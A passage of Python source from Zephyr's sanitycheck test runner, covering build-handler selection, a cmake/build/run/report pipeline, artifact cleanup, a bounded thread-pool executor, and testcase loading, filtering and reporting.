self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.pid_fn = os.path.join(instance.build_dir, "mdb.pid")
instance.handler.call_west_flash = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
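# Handler selection, summarised from the branches above: qemu simulation -> QEMUHandler
# driving "make run"; unit tests -> BinaryHandler on "testbinary" (with COVERAGE=1 when
# coverage is enabled); native platforms -> BinaryHandler on zephyr/zephyr.exe with the
# asan/lsan/ubsan/valgrind/coverage knobs; renode and nsim -> BinaryHandler only when the
# respective tool is on PATH; device testing -> DeviceHandler. Whatever handler is created
# inherits this builder's generator and generator_cmd.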
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
self.suite.build_filtered_tests += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
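# The process() method above is a small state machine driven by pipeline messages of the
# form {"op": <stage>, "test": instance}; the stages chain roughly as
#   cmake -> build -> run -> report -> cleanup
# e.g. a successful build enqueues {"op": "run", "test": self.instance} when the instance
# is runnable and has a handler, otherwise it goes straight to {"op": "report", ...}.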
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self):
total_tests_width = len(str(self.suite.total_to_do))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if self.suite.total_to_do > 0:
completed_perc = int((float(self.suite.total_done) / self.suite.total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if self.suite.build_filtered_tests > 0 else Fore.RESET,
self.suite.build_filtered_tests,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
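# Minimal usage sketch (mirrors how execute() uses it further below): submit() blocks once
# roughly `bound` work items are queued on top of the running workers, which keeps the task
# feeder from outrunning the builders.
#   with BoundedExecutor(bound=jobs, max_workers=jobs) as executor:
#       future = executor.submit(fn, *args)
# The semaphore is released from the future's done-callback, so a slot is recycled even
# when fn raises.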
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
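# For orientation, a hypothetical testcase.yaml entry exercising a few of the keys
# validated above could look like this (values are made up; the authoritative layout is
# defined by testcase-schema.yaml, not shown here):
#   tests:
#     sample.basic:
#       tags: kernel
#       platform_allow: native_posix
#       min_ram: 16
#       timeout: 120
#       harness: console
#       harness_config:
#         type: one_line
#         regex:
#           - "Hello World!"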
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_skipped_cases = 0 # number of skipped test cases
self.total_to_do = 0 # number of test instances to be run
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.build_filtered_tests = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
# run integration tests only
self.integration = False
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self):
self.total_tests = len(self.instances)
self.total_cases = 0
self.total_skipped = 0
self.total_skipped_cases = 0
self.total_passed = 0
for instance in self.instances.values():
self.total_cases += len(instance.testcase.cases)
if instance.status == 'skipped':
self.total_skipped += 1
self.total_skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
self.total_passed += 1
for res in instance.results.values():
if res == 'SKIP':
self.total_skipped_cases += 1
self.total_to_do = self.total_tests - self.total_skipped
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases - self.total_skipped_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run - self.total_skipped}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.connected_hardware:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = discards.get(instance, "Not a default test platform")
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
return discards
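# Typical flow, as a sketch rather than a prescription: add_configurations() and
# add_testcases() populate self.platforms and self.testcases, then apply_filters(**options)
# builds self.instances and records every rejected (testcase, platform) combination in
# self.discards with a human-readable reason, which discard_report() later writes to CSV.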
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.build_only, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a message from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception:' % (test,))
for line in traceback.format_exc().splitlines():
logger.error(line)
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
